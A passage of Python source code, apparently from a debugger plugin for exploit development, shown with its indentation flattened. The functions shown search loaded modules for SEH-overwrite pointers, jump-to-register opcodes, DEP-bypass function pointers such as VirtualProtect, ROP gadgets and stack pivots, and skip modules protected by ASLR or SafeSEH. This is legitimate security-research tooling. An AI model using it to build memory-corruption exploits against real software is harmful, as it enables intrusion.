thissearch = ["pop "+r1+"\npop "+r2+"\nret "+roffset,dbg.assemble("pop "+r1+"\npop "+r2+"\nret "+roffset)]
search.append( thissearch )
if type == "rop":
search.append( ["pop "+r1+"\npop "+r2+"\npop esp\nret "+roffset,dbg.assemble("pop "+r1+"\npop "+r2+"\npop esp\nret "+roffset)] )
for r3 in regs:
search.append( ["pop "+r1+"\npop "+r2+"\npop "+r3+"\ncall ["+r3+"]",dbg.assemble("pop "+r1+"\npop "+r2+"\npop "+r3+"\ncall ["+r3+"]")] )
search.append( ["add esp,8\nret "+roffset,dbg.assemble("add esp,8\nret "+roffset)])
search.append( ["popad\npush ebp\nret "+roffset,dbg.assemble("popad\npush ebp\nret "+roffset)])
#popad + jmp/call
search.append(["popad\njmp ebp",dbg.assemble("popad\njmp ebp")])
search.append(["popad\ncall ebp",dbg.assemble("popad\ncall ebp")])
#call / jmp dword
search.append(["call dword ptr ss:[esp+08]","\xff\x54\x24\x08"])
search.append(["call dword ptr ss:[esp+08]","\xff\x94\x24\x08\x00\x00\x00"])
search.append(["call dword ptr ds:[esp+08]","\x3e\xff\x54\x24\x08"])
search.append(["jmp dword ptr ss:[esp+08]","\xff\x64\x24\x08"])
search.append(["jmp dword ptr ss:[esp+08]","\xff\xa4\x24\x08\x00\x00\x00"])
search.append(["jmp dword ptr ds:[esp+08]","\x3e\xff\x64\x24\x08"])
search.append(["call dword ptr ss:[esp+14]","\xff\x54\x24\x14"])
search.append(["call dword ptr ss:[esp+14]","\xff\x94\x24\x14\x00\x00\x00"])
search.append(["call dword ptr ds:[esp+14]","\x3e\xff\x54\x24\x14"])
search.append(["jmp dword ptr ss:[esp+14]","\xff\x64\x24\x14"])
search.append(["jmp dword ptr ss:[esp+14]","\xff\xa4\x24\x14\x00\x00\x00"])
search.append(["jmp dword ptr ds:[esp+14]","\x3e\xff\x64\x24\x14"])
search.append(["call dword ptr ss:[esp+1c]","\xff\x54\x24\x1c"])
search.append(["call dword ptr ss:[esp+1c]","\xff\x94\x24\x1c\x00\x00\x00"])
search.append(["call dword ptr ds:[esp+1c]","\x3e\xff\x54\x24\x1c"])
search.append(["jmp dword ptr ss:[esp+1c]","\xff\x64\x24\x1c"])
search.append(["jmp dword ptr ss:[esp+1c]","\xff\xa4\x24\x1c\x00\x00\x00"])
search.append(["jmp dword ptr ds:[esp+1c]","\x3e\xff\x64\x24\x1c"])
search.append(["call dword ptr ss:[esp+2c]","\xff\x54\x24\x2c"])
search.append(["call dword ptr ss:[esp+2c]","\xff\x94\x24\x2c\x00\x00\x00"])
search.append(["call dword ptr ds:[esp+2c]","\x3e\xff\x54\x24\x2c"])
search.append(["jmp dword ptr ss:[esp+2c]","\xff\x64\x24\x2c"])
search.append(["jmp dword ptr ss:[esp+2c]","\xff\xa4\x24\x2c\x00\x00\x00"])
search.append(["jmp dword ptr ds:[esp+2c]","\x3e\xff\x64\x24\x2c"])
search.append(["call dword ptr ss:[esp+44]","\xff\x54\x24\x44"])
search.append(["call dword ptr ss:[esp+44]","\xff\x94\x24\x44\x00\x00\x00"])
search.append(["call dword ptr ds:[esp+44]","\x3e\xff\x54\x24\x44"])
search.append(["jmp dword ptr ss:[esp+44]","\xff\x64\x24\x44"])
search.append(["jmp dword ptr ss:[esp+44]","\xff\xa4\x24\x44\x00\x00\x00"])
search.append(["jmp dword ptr ds:[esp+44]","\x3e\xff\x64\x24\x44"])
search.append(["call dword ptr ss:[esp+50]","\xff\x54\x24\x50"])
search.append(["call dword ptr ss:[esp+50]","\xff\x94\x24\x50\x00\x00\x00"])
search.append(["call dword ptr ds:[esp+50]","\x3e\xff\x54\x24\x50"])
search.append(["jmp dword ptr ss:[esp+50]","\xff\x64\x24\x50"])
search.append(["jmp dword ptr ss:[esp+50]","\xff\xa4\x24\x50\x00\x00\x00"])
search.append(["jmp dword ptr ds:[esp+50]","\x3e\xff\x64\x24\x50"])
search.append(["call dword ptr ss:[ebp+0c]","\xff\x55\x0c"])
search.append(["call dword ptr ss:[ebp+0c]","\xff\x95\x0c\x00\x00\x00"])
search.append(["call dword ptr ds:[ebp+0c]","\x3e\xff\x55\x0c"])
search.append(["jmp dword ptr ss:[ebp+0c]","\xff\x65\x0c"])
search.append(["jmp dword ptr ss:[ebp+0c]","\xff\xa5\x0c\x00\x00\x00"])
search.append(["jmp dword ptr ds:[ebp+0c]","\x3e\xff\x65\x0c"])
search.append(["call dword ptr ss:[ebp+24]","\xff\x55\x24"])
search.append(["call dword ptr ss:[ebp+24]","\xff\x95\x24\x00\x00\x00"])
search.append(["call dword ptr ds:[ebp+24]","\x3e\xff\x55\x24"])
search.append(["jmp dword ptr ss:[ebp+24]","\xff\x65\x24"])
search.append(["jmp dword ptr ss:[ebp+24]","\xff\xa5\x24\x00\x00\x00"])
search.append(["jmp dword ptr ds:[ebp+24]","\x3e\xff\x65\x24"])
search.append(["call dword ptr ss:[ebp+30]","\xff\x55\x30"])
search.append(["call dword ptr ss:[ebp+30]","\xff\x95\x30\x00\x00\x00"])
search.append(["call dword ptr ds:[ebp+30]","\x3e\xff\x55\x30"])
search.append(["jmp dword ptr ss:[ebp+30]","\xff\x65\x30"])
search.append(["jmp dword ptr ss:[ebp+30]","\xff\xa5\x30\x00\x00\x00"])
search.append(["jmp dword ptr ds:[ebp+30]","\x3e\xff\x65\x30"])
search.append(["call dword ptr ss:[ebp-04]","\xff\x55\xfc"])
search.append(["call dword ptr ss:[ebp-04]","\xff\x95\xfc\xff\xff\xff"])
search.append(["call dword ptr ds:[ebp-04]","\x3e\xff\x55\xfc"])
search.append(["jmp dword ptr ss:[ebp-04]","\xff\x65\xfc",])
search.append(["jmp dword ptr ss:[ebp-04]","\xff\xa5\xfc\xff\xff\xff",])
search.append(["jmp dword ptr ds:[ebp-04]","\x3e\xff\x65\xfc",])
search.append(["call dword ptr ss:[ebp-0c]","\xff\x55\xf4"])
search.append(["call dword ptr ss:[ebp-0c]","\xff\x95\xf4\xff\xff\xff"])
search.append(["call dword ptr ds:[ebp-0c]","\x3e\xff\x55\xf4"])
search.append(["jmp dword ptr ss:[ebp-0c]","\xff\x65\xf4",])
search.append(["jmp dword ptr ss:[ebp-0c]","\xff\xa5\xf4\xff\xff\xff",])
search.append(["jmp dword ptr ds:[ebp-0c]","\x3e\xff\x65\xf4",])
search.append(["call dword ptr ss:[ebp-18]","\xff\x55\xe8"])
search.append(["call dword ptr ss:[ebp-18]","\xff\x95\xe8\xff\xff\xff"])
search.append(["call dword ptr ds:[ebp-18]","\x3e\xff\x55\xe8"])
search.append(["jmp dword ptr ss:[ebp-18]","\xff\x65\xe8",])
search.append(["jmp dword ptr ss:[ebp-18]","\xff\xa5\xe8\xff\xff\xff",])
search.append(["jmp dword ptr ds:[ebp-18]","\x3e\xff\x65\xe8",])
return search
def getModulesToQuery(criteria):
"""
This function will return an array of modulenames
Arguments:
Criteria - dictionary with module criteria
Return:
array with module names that meet the given criteria
"""
# always populate module info, in case more DLLs were loaded
populateModuleInfo()
modulestoquery=[]
for thismodule,modproperties in g_modules.iteritems():
#is this module excluded ?
thismod = MnModule(thismodule)
included = True
if not thismod.isExcluded:
#check other criteria
if ("safeseh" in criteria) and ((not criteria["safeseh"]) and thismod.isSafeSEH):
included = False
if ("aslr" in criteria) and ((not criteria["aslr"]) and thismod.isAslr):
included = False
if ("rebase" in criteria) and ((not criteria["rebase"]) and thismod.isRebase):
included = False
if ("os" in criteria) and ((not criteria["os"]) and thismod.isOS):
included = False
if ("nx" in criteria) and ((not criteria["nx"]) and thismod.isNX):
included = False
else:
included = False
#override all previous decision if "modules" criteria was provided
thismodkey = thismod.moduleKey.lower().strip()
if ("modules" in criteria) and (criteria["modules"] != ""):
included = False
modulenames=criteria["modules"].split(",")
for modulename in modulenames:
modulename = modulename.strip('"').strip("'").lower()
modulenamewithout = modulename.replace("*","")
if len(modulenamewithout) <= len(thismodkey):
#endswith ?
if modulename[0] == "*":
if modulenamewithout == thismodkey[len(thismodkey)-len(modulenamewithout):len(thismodkey)]:
if not thismod.moduleKey in modulestoquery and not thismod.isExcluded:
modulestoquery.append(thismod.moduleKey)
#startswith ?
if modulename[len(modulename)-1] == "*":
if (modulenamewithout == thismodkey[0:len(modulenamewithout)] and not thismod.isExcluded):
if not thismod.moduleKey in modulestoquery:
modulestoquery.append(thismod.moduleKey)
#contains ?
if ((modulename[0] == "*" and modulename[len(modulename)-1] == "*") or (modulename.find("*") == -1)) and not thismod.isExcluded:
if thismodkey.find(modulenamewithout) > -1:
if not thismod.moduleKey in modulestoquery:
modulestoquery.append(thismod.moduleKey)
if included:
modulestoquery.append(thismod.moduleKey)
return modulestoquery
def getPointerAccess(address):
"""
Returns access level of specified address, in human readable format
Arguments:
address - integer value
Return:
Access level (human readable format)
"""
global MemoryPageACL
paccess = ""
try:
page = dbg.getMemoryPageByAddress( address )
if page in MemoryPageACL:
paccess = MemoryPageACL[page]
else:
paccess = page.getAccess( human = True )
MemoryPageACL[page] = paccess
except:
paccess = ""
return paccess
def getModuleProperty(modname,parameter):
"""
Returns value of a given module property
Argument :
modname - module name
parameter name - (see populateModuleInfo())
Returns :
value associcated with the given parameter / module combination
"""
modname=modname.strip()
parameter=parameter.lower()
valtoreturn=""
# try case sensitive first
for thismodule,modproperties in g_modules.iteritems():
if thismodule.strip() == modname:
return modproperties[parameter]
return valtoreturn
def populateModuleInfo():
"""
Populate global dictionary with information about all loaded modules
Return:
Dictionary
"""
if not silent:
dbg.setStatusBar("Getting modules info...")
dbg.log("[+] Generating module info table, hang on...")
dbg.log(" - Processing modules")
dbg.updateLog()
global g_modules
g_modules={}
allmodules=dbg.getAllModules()
curmod = ""
for key in allmodules.keys():
modinfo={}
thismod = MnModule(key)
if not thismod is None:
modinfo["path"] = thismod.modulePath
modinfo["base"] = thismod.moduleBase
modinfo["size"] = thismod.moduleSize
modinfo["top"] = thismod.moduleTop
modinfo["safeseh"] = thismod.isSafeSEH
modinfo["aslr"] = thismod.isAslr
modinfo["nx"] = thismod.isNX
modinfo["rebase"] = thismod.isRebase
modinfo["version"] = thismod.moduleVersion
modinfo["os"] = thismod.isOS
modinfo["name"] = key
modinfo["entry"] = thismod.moduleEntry
modinfo["codebase"] = thismod.moduleCodebase
modinfo["codesize"] = thismod.moduleCodesize
modinfo["codetop"] = thismod.moduleCodetop
g_modules[thismod.moduleKey] = modinfo
else:
if not silent:
dbg.log(" - Oops, potential issue with module %s, skipping module" % key)
if not silent:
dbg.log(" - Done. Let's rock 'n roll.")
dbg.setStatusBar("")
dbg.updateLog()
def ModInfoCached(modulename):
"""
Check if the information about a given module is already cached in the global Dictionary
Arguments:
modulename - name of the module to check
Return:
Boolean - True if the module info is cached
"""
if (getModuleProperty(modulename,"base") == ""):
return False
else:
return True
def showModuleTable(logfile="", modules=[]):
"""
Shows table with all loaded modules and their properties.
Arguments :
empty string - output will be sent to log window
or
filename - output will be written to the filename
modules - dictionary with modules to query - result of a populateModuleInfo() call
"""
thistable = ""
if len(g_modules) == 0:
populateModuleInfo()
thistable += "-----------------------------------------------------------------------------------------------------------------------------------------\n"
thistable += " Module info :\n"
thistable += "-----------------------------------------------------------------------------------------------------------------------------------------\n"
if arch == 32:
thistable += " Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path\n"
elif arch == 64:
thistable += " Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path\n"
thistable += "-----------------------------------------------------------------------------------------------------------------------------------------\n"
for thismodule,modproperties in g_modules.iteritems():
if (len(modules) > 0 and modproperties["name"] in modules or len(logfile)>0):
rebase = toSize(str(modproperties["rebase"]),7)
base = toSize(str("0x" + toHex(modproperties["base"])),10)
top = toSize(str("0x" + toHex(modproperties["top"])),10)
size = toSize(str("0x" + toHex(modproperties["size"])),10)
safeseh = toSize(str(modproperties["safeseh"]),7)
aslr = toSize(str(modproperties["aslr"]),5)
nx = toSize(str(modproperties["nx"]),7)
isos = toSize(str(modproperties["os"]),7)
version = str(modproperties["version"])
path = str(modproperties["path"])
name = str(modproperties["name"])
thistable += " " + base + " | " + top + " | " + size + " | " + rebase +"| " +safeseh + " | " + aslr + " | " + nx + " | " + isos + "| " + version + " [" + name + "] (" + path + ")\n"
thistable += "-----------------------------------------------------------------------------------------------------------------------------------------\n"
tableinfo = thistable.split('\n')
if logfile == "":
with open(S17_LOGFILE,"a") as fh:
fh.writelines(thistable)
dbg.log("Output written to: " + S17_LOGFILE)
else:
with open(logfile,"a") as fh:
fh.writelines(thistable)
#-----------------------------------------------------------------------#
# This is where the action is
#-----------------------------------------------------------------------#
def processResults(all_opcodes,logfile,thislog,specialcases = {},ptronly = False):
"""
Write the output of a search operation to log file
Arguments:
all_opcodes - dictionary containing the results of a search
logfile - the MnLog object
thislog - the filename to write to
Return:
written content in log file
first 20 pointers are shown in the log window
"""
ptrcnt = 0
cnt = 0
global silent
if all_opcodes:
dbg.log("[+] Writing results to %s" % thislog)
for hf in all_opcodes:
if not silent:
try:
dbg.log(" - Number of pointers of type '%s' : %d " % (hf,len(all_opcodes[hf])))
except:
dbg.log(" - Number of pointers of type '<unable to display>' : %d " % (len(all_opcodes[hf])))
if not ptronly:
if not silent:
with open(S17_LOGFILE, 'a') as fn:
fn.write("Results of find:\n")
dbg.log("[+] Results written to: "+S17_LOGFILE)
messageshown = False
for optext,pointers in all_opcodes.iteritems():
for ptr in pointers:
ptrinfo = ""
modinfo = ""
ptrx = MnPointer(ptr)
modname = ptrx.belongsTo()
if not modname == "":
modobj = MnModule(modname)
ptrextra = ""
rva=0
if (modobj.isRebase or modobj.isAslr):
rva = ptr - modobj.moduleBase
ptrextra = " (b+0x" + toHex(rva)+") "
ptrinfo = "0x" + toHex(ptr) + ptrextra + " : " + optext + " | " + ptrx.__str__() + " " + modobj.__str__()
else:
ptrinfo = "0x" + toHex(ptr) + " : " + optext + " | " + ptrx.__str__()
if ptrx.isOnStack():
ptrinfo += " [Stack] "
elif ptrx.isInHeap():
ptrinfo += " [Heap] "
logfile.write(ptrinfo,thislog)
if (ptr_to_get > -1) or (cnt < 20):
if not silent:
with open(S17_LOGFILE, 'a') as fn:
fn.write(" %s\n" % ptrinfo)
#dbg.log(" %s" % ptrinfo,address=ptr)
cnt += 1
ptrcnt += 1
if (ptr_to_get == -1 or ptr_to_get > 20) and cnt == 20 and not silent and not messageshown:
dbg.log("... Please wait while I'm processing all remaining results and writing everything to file...")
messageshown = True
if cnt < ptrcnt:
if not silent:
dbg.log("[+] Done. Only the first %d pointers are shown here. For more pointers, open %s..." % (cnt,thislog))
else:
allptr = []
ptrcnt = 0
ptrinfo = ""
dbg.log("... Please wait while I'm processing results and writing everything to file...")
for optext,pointers in all_opcodes.iteritems():
for ptr in pointers:
if not ptr in allptr:
ptrinfo += "0x%s\n" % toHex(ptr)
ptrcnt += 1
if not silent:
dbg.log("[+] Writing results to file")
logfile.write(ptrinfo,thislog)
if not silent:
dbg.log("[+] Done")
dbg.log(" Found a total of %d pointers" % ptrcnt, highlight=1)
with open(S17_LOGFILE, 'a') as fn:
fn.write("Found a total of %d pointers\n" % ptrcnt)
dbg.setStatusBar("Done. Found %d pointers" % ptrcnt)
def mergeOpcodes(all_opcodes,found_opcodes):
"""
merges two dictionaries together
Arguments:
all_opcodes - the target dictionary
found_opcodes - the source dictionary
Return:
Dictionary (merged dictionaries)
"""
if found_opcodes:
for hf in found_opcodes:
if hf in all_opcodes:
all_opcodes[hf] += found_opcodes[hf]
else:
all_opcodes[hf] = found_opcodes[hf]
return all_opcodes
def findSEH(modulecriteria={},criteria={}):
"""
Performs a search for pointers to gain code execution in a SEH overwrite exploit
Arguments:
modulecriteria - dictionary with criteria modules need to comply with.
Default settings are : ignore aslr, rebase and safeseh protected modules
criteria - dictionary with criteria the pointers need to comply with.
Return:
Dictionary (pointers)
"""
type = ""
if "rop" in criteria:
type = "rop"
search = getSearchSequences("seh",0,type)
found_opcodes = {}
all_opcodes = {}
modulestosearch = getModulesToQuery(modulecriteria)
if not silent:
dbg.log("[+] Querying %d modules" % len(modulestosearch))
starttime = datetime.datetime.now()
for thismodule in modulestosearch:
if not silent:
dbg.log(" - Querying module %s" % thismodule)
dbg.updateLog()
#search
found_opcodes = searchInModule(search,thismodule,criteria)
#merge results
all_opcodes = mergeOpcodes(all_opcodes,found_opcodes)
#search outside modules
if "all" in criteria:
if "accesslevel" in criteria:
if criteria["accesslevel"].find("R") == -1:
if not silent:
dbg.log("[+] Setting pointer access level criteria to 'R', to increase search results")
criteria["accesslevel"] = "R"
if not silent:
dbg.log(" New pointer access level : %s" % criteria["accesslevel"])
if criteria["all"]:
rangestosearch = getRangesOutsideModules()
if not silent:
dbg.log("[+] Querying memory outside modules")
for thisrange in rangestosearch:
if not silent:
dbg.log(" - Querying 0x%08x - 0x%08x" % (thisrange[0],thisrange[1]))
found_opcodes = searchInRange(search, thisrange[0], thisrange[1],criteria)
all_opcodes = mergeOpcodes(all_opcodes,found_opcodes)
if not silent:
dbg.log(" - Search complete, processing results")
dbg.updateLog()
return all_opcodes
def findJMP(modulecriteria={},criteria={},register="esp"):
"""
Performs a search for pointers to jump to a given register
Arguments:
modulecriteria - dictionary with criteria modules need to comply with.
Default settings are : ignore aslr and rebased modules
criteria - dictionary with criteria the pointers need to comply with.
register - the register to jump to
Return:
Dictionary (pointers)
"""
search = getSearchSequences("jmp",register,"",criteria)
found_opcodes = {}
all_opcodes = {}
modulestosearch = getModulesToQuery(modulecriteria)
if not silent:
dbg.log("[+] Querying %d modules" % len(modulestosearch))
starttime = datetime.datetime.now()
for thismodule in modulestosearch:
if not silent:
dbg.log(" - Querying module %s" % thismodule)
dbg.updateLog()
#search
found_opcodes = searchInModule(search,thismodule,criteria)
#merge results
all_opcodes = mergeOpcodes(all_opcodes,found_opcodes)
if not silent:
dbg.log(" - Search complete, processing results")
dbg.updateLog()
return all_opcodes
def findROPFUNC(modulecriteria={},criteria={},searchfuncs=[]):
"""
Performs a search for pointers to pointers to interesting functions to facilitate a ROP exploit
Arguments:
modulecriteria - dictionary with criteria modules need to comply with.
Default settings are : ignore aslr and rebased modules
criteria - dictionary with criteria the pointers need to comply with.
optional :
searchfuncs - array with functions to include in the search
Return:
Dictionary (pointers)
"""
found_opcodes = {}
all_opcodes = {}
ptr_counter = 0
ropfuncs = {}
funccallresults = []
ropfuncoffsets = {}
functionnames = []
offsets = {}
modulestosearch = getModulesToQuery(modulecriteria)
if searchfuncs == []:
functionnames = ["virtualprotect","virtualalloc","heapalloc","winexec","setprocessdeppolicy","heapcreate","setinformationprocess","writeprocessmemory","memcpy","memmove","strncpy","createmutex","getlasterror","strcpy","loadlibrary","freelibrary","getmodulehandle","getprocaddress","openfile","createfile","createfilemapping","mapviewoffile","openfilemapping"]
offsets["kernel32.dll"] = ["virtualprotect","virtualalloc","writeprocessmemory"]
# on newer OSes, functions are stored in kernelbase.dll
offsets["kernelbase.dll"] = ["virtualprotect","virtualalloc","writeprocessmemory"]
else:
functionnames = searchfuncs
offsets["kernel32.dll"] = searchfuncs
# on newer OSes, functions are stored in kernelbase.dll
offsets["kernelbase.dll"] = searchfuncs
if not silent:
dbg.log("[+] Looking for pointers to interesting functions...")
curmod = ""
#ropfuncfilename="ropfunc.txt"
#objropfuncfile = MnLog(ropfuncfilename)
#ropfuncfile = objropfuncfile.reset()
offsetpointers = {}
# populate absolute pointers
for themod in offsets:
fnames = offsets[themod]
try:
themodule = MnModule(themod)
if not themodule is None:
allfuncs = themodule.getEAT()
for fn in allfuncs:
for fname in fnames:
if allfuncs[fn].lower().find(fname.lower()) > -1:
#dbg.log("Found match: %s %s -> %s ?" % (themod, allfuncs[fn].lower(), fname.lower()))
fname = allfuncs[fn].lower()
if not fname in offsetpointers:
offsetpointers[fname] = fn
break
except:
continue
# found pointers to functions
# now query IATs
#dbg.log("%s" % modulecriteria)
isrebased = False
for key in modulestosearch:
curmod = dbg.getModule(key)
#dbg.log("Searching in IAT of %s" % key)
#is this module going to get rebase ?
themodule = MnModule(key)
isrebased = themodule.isRebase
if not silent:
dbg.log(" - Querying %s" % (key))
allfuncs = themodule.getIAT()
dbg.updateLog()
for fn in allfuncs:
thisfuncname = allfuncs[fn].lower()
thisfuncfullname = thisfuncname
if not meetsCriteria(MnPointer(fn), criteria):
continue
ptr = 0
try:
ptr=struct.unpack('<L',dbg.readMemory(fn,4))[0]
except:
pass
if ptr != 0:
# get offset to one of the offset functions
# where does pointer belong to ?
pmodname = MnPointer(ptr).belongsTo()
if pmodname != "":
if pmodname.lower() in offsets:
# find distance to each of the interesting functions in this module
for interestingfunc in offsets[pmodname.lower()]:
if interestingfunc in offsetpointers:
offsetvalue = offsetpointers[interestingfunc] - ptr
operator = ""
if offsetvalue < 0:
operator = "-"
offsetvaluehex = toHex(offsetvalue).replace("-","")
thetype = "(%s - IAT 0x%s : %s.%s (0x%s), offset to %s.%s (0x%s) : %d (%s0x%s)" % (key,toHex(fn),pmodname,thisfuncfullname,toHex(ptr),pmodname,interestingfunc,toHex(offsetpointers[interestingfunc]),offsetvalue,operator,offsetvaluehex)
if not thetype in ropfuncoffsets:
ropfuncoffsets[thetype] = [fn]
# see if it's a function we are looking for
for funcsearch in functionnames:
funcsearch = funcsearch.lower()
if thisfuncname.find(funcsearch) > -1:
extra = ""
extrafunc = ""
if isrebased:
extra = " [Warning : module is likely to get rebased !]"
extrafunc = "-rebased"
if not silent:
dbg.log(" 0x%s : ptr to %s (0x%s) (%s) %s" % (toHex(fn),thisfuncname,toHex(ptr),key,extra))
logtxt = thisfuncfullname.lower().strip()+extrafunc+" | 0x" + toHex(ptr)
if logtxt in ropfuncs:
ropfuncs[logtxt] += [fn]
else:
ropfuncs[logtxt] = [fn]
ptr_counter += 1
if ptr_to_get > 0 and ptr_counter >= ptr_to_get:
ropfuncs,ropfuncoffsets
return ropfuncs,ropfuncoffsets
def assemble(instructions,encoder=""):
"""
Assembles one or more instructions to opcodes
Arguments:
instructions = the instructions to assemble (separated by #)
Return:
Dictionary (pointers)
"""
if not silent:
dbg.log("Opcode results : ")
dbg.log("---------------- ")
allopcodes=""
instructions = instructions.replace('"',"").replace("'","")
splitter=re.compile('#')
instructions=splitter.split(instructions)
for instruct in instructions:
try:
instruct = instruct.strip()
assembled=dbg.assemble(instruct)
strAssembled=""
for assemOpc in assembled:
if (len(hex(ord(assemOpc)))) == 3:
subAssembled = "\\x0"+hex(ord(assemOpc)).replace('0x','')
strAssembled = strAssembled+subAssembled
else:
strAssembled = strAssembled+hex(ord(assemOpc)).replace('0x', '\\x')
if len(strAssembled) < 30:
if not silent:
dbg.log(" %s = %s" % (instruct,strAssembled))
allopcodes=allopcodes+strAssembled
else:
if not silent:
dbg.log(" %s => Unable to assemble this instruction !" % instruct,highlight=1)
except:
if not silent:
dbg.log(" Could not assemble %s " % instruct)
pass
if not silent:
dbg.log(" Full opcode : %s " % allopcodes)
return allopcodes
def findROPGADGETS(modulecriteria={},criteria={},endings=[],maxoffset=40,depth=5,split=False,pivotdistance=0,fast=False,mode="all"):
"""
Searches for rop gadgets
Arguments:
modulecriteria - dictionary with criteria modules need to comply with.
Default settings are : ignore aslr and rebased modules
criteria - dictionary with criteria the pointers need to comply with.
endings - array with all rop gadget endings to look for. Default : RETN and RETN+offsets
maxoffset - maximum offset value for RETN if endings are set to RETN
depth - maximum number of instructions to go back
split - Boolean that indicates whether routine should write all gadgets to one file, or split per module
pivotdistance - minimum distance a stackpivot needs to be
fast - Boolean indicating if you want to process less obvious gadgets as well
mode - internal use only
Return:
Output is written to files, containing rop gadgets, suggestions, stack pivots and virtualprotect/virtualalloc routine (if possible)
"""
found_opcodes = {}
all_opcodes = {}
ptr_counter = 0
modulestosearch = getModulesToQuery(modulecriteria)
progressid=str(dbg.getDebuggedPid())
progressfilename="_rop_progress_"+dbg.getDebuggedName()+"_"+progressid+".log"
objprogressfile = MnLog(progressfilename)
progressfile = objprogressfile.reset()
dbg.log("[+] Progress will be written to %s" % progressfilename)
dbg.log("[+] Maximum offset : %d" % maxoffset)
dbg.log("[+] (Minimum/optional maximum) stackpivot distance : %s" % str(pivotdistance))
dbg.log("[+] Max nr of instructions : %d" % depth)
dbg.log("[+] Split output into module rop files ? %s" % split)
usefiles = False
filestouse = []
vplogtxt = ""
suggestions = {}
if "f" in criteria:
if criteria["f"] <> "":
if type(criteria["f"]).__name__.lower() != "bool":
usefiles = True
rawfilenames = criteria["f"].replace('"',"")
allfiles = rawfilenames.split(',')
#check if files exist
dbg.log("[+] Attempting to use %d rop file(s) as input" % len(allfiles))
for fname in allfiles:
fname = fname.strip()
if not os.path.exists(fname):
dbg.log(" ** %s : Does not exist !" % fname, highlight=1)
else:
filestouse.append(fname)
if len(filestouse) == 0:
dbg.log(" ** Unable to find any of the source files, aborting... **", highlight=1)
return
search = []
if not usefiles:
if len(endings) == 0:
#RETN only
search.append("RETN")
for i in range(0, maxoffset + 1, 2):
search.append("RETN 0x"+ toHexByte(i))
else:
for ending in endings:
dbg.log("[+] Custom ending : %s" % ending)
if ending != "":
search.append(ending)
if len(modulestosearch) == 0:
dbg.log("[-] No modules selected, aborting search", highlight = 1)
return
dbg.log("[+] Enumerating %d endings in %d module(s)..." % (len(search),len(modulestosearch)))
for thismodule in modulestosearch:
dbg.log(" - Querying module %s" % thismodule)
dbg.updateLog()
#search
found_opcodes = searchInModule(search,thismodule,criteria)
#merge results
all_opcodes = mergeOpcodes(all_opcodes,found_opcodes)
dbg.log(" - Search complete :")
else:
dbg.log("[+] Reading input files")
for filename in filestouse:
dbg.log(" - Reading %s" % filename)
all_opcodes = mergeOpcodes(all_opcodes,readGadgetsFromFile(filename))
dbg.updateLog()
tp = 0
for endingtype in all_opcodes:
if len(all_opcodes[endingtype]) > 0:
if usefiles:
dbg.log(" Ending : %s, Nr found : %d" % (endingtype,len(all_opcodes[endingtype]) / 2))
tp = tp + len(all_opcodes[endingtype]) / 2
else:
dbg.log(" Ending : %s, Nr found : %d" % (endingtype,len(all_opcodes[endingtype])))
tp = tp + len(all_opcodes[endingtype])
global silent
if not usefiles:
dbg.log(" - Filtering and mutating %d gadgets" % tp)
else:
dbg.log(" - Categorizing %d gadgets" % tp)
silent = True
dbg.updateLog()
ropgadgets = {}
interestinggadgets = {}
stackpivots = {}
stackpivots_safeseh = {}
adcnt = 0
tc = 1
issafeseh = False
step = 0
updateth = 1000
if (tp >= 2000 and tp < 5000):
updateth = 500
if (tp < 2000):
updateth = 100
for endingtype in all_opcodes:
if len(all_opcodes[endingtype]) > 0:
for endingtypeptr in all_opcodes[endingtype]:
adcnt=adcnt+1
if usefiles:
adcnt = adcnt - 0.5
if adcnt > (tc*updateth):
thistimestamp=datetime.datetime.now().strftime("%a %Y/%m/%d %I:%M:%S %p")
updatetext = " - Progress update : " + str(tc*updateth) + " / " + str(tp) + " items processed (" + thistimestamp + ") - (" + str((tc*updateth*100)/tp)+"%)"
objprogressfile.write(updatetext.strip(),progressfile)
dbg.log(updatetext)
dbg.updateLog()
tc += 1
if not usefiles:
#first get max backward instruction
thisopcode = dbg.disasmBackward(endingtypeptr,depth+1)
thisptr = thisopcode.getAddress()
# we now have a range to mine
startptr = thisptr
currentmodulename = MnPointer(thisptr).belongsTo()
modinfo = MnModule(currentmodulename)
issafeseh = modinfo.isSafeSEH
while startptr <= endingtypeptr and startptr != 0x0:
# get the entire chain from startptr to endingtypeptr
thischain = ""
msfchain = []
thisopcodebytes = ""
chainptr = startptr
if isGoodGadgetPtr(startptr,criteria) and not startptr in ropgadgets and not startptr in interestinggadgets:
invalidinstr = False
while chainptr < endingtypeptr and not invalidinstr:
thisopcode = dbg.disasm(chainptr)
thisinstruction = getDisasmInstruction(thisopcode)
if isGoodGadgetInstr(thisinstruction) and not isGadgetEnding(thisinstruction,search):
thischain = thischain + " # " + thisinstruction
msfchain.append([chainptr,thisinstruction])
thisopcodebytes = thisopcodebytes + opcodesToHex(thisopcode.getDump().lower())
chainptr = dbg.disasmForwardAddressOnly(chainptr,1)
else:
invalidinstr = True
if endingtypeptr == chainptr and startptr != chainptr and not invalidinstr:
fullchain = thischain + " # " + endingtype
msfchain.append([endingtypeptr,endingtype])
thisopcode = dbg.disasm(endingtypeptr)
thisopcodebytes = thisopcodebytes + opcodesToHex(thisopcode.getDump().lower())
msfchain.append(["raw",thisopcodebytes])
if isInterestingGadget(fullchain):
interestinggadgets[startptr] = fullchain
#this may be a good stackpivot too
stackpivotdistance = getStackPivotDistance(fullchain,pivotdistance)
if stackpivotdistance > 0:
#safeseh or not ?
if issafeseh:
if not stackpivotdistance in stackpivots_safeseh:
stackpivots_safeseh.setdefault(stackpivotdistance,[[startptr,fullchain]])
else:
stackpivots_safeseh[stackpivotdistance] += [[startptr,fullchain]]
else:
if not stackpivotdistance in stackpivots:
stackpivots.setdefault(stackpivotdistance,[[startptr,fullchain]])
else:
stackpivots[stackpivotdistance] += [[startptr,fullchain]]
else:
if not fast:
ropgadgets[startptr] = fullchain
startptr = startptr+1
else:
if step == 0:
startptr = endingtypeptr
if step == 1:
thischain = endingtypeptr
chainptr = startptr
ptrx = MnPointer(chainptr)
modname = ptrx.belongsTo()
issafeseh = False
if modname != "":
thism = MnModule(modname)
issafeseh = thism.isSafeSEH
if isGoodGadgetPtr(startptr,criteria) and not startptr in ropgadgets and not startptr in interestinggadgets:
fullchain = thischain
if isInterestingGadget(fullchain):
interestinggadgets[startptr] = fullchain
#this may be a good stackpivot too
stackpivotdistance = getStackPivotDistance(fullchain,pivotdistance)
if stackpivotdistance > 0:
#safeseh or not ?
if issafeseh:
if not stackpivotdistance in stackpivots_safeseh:
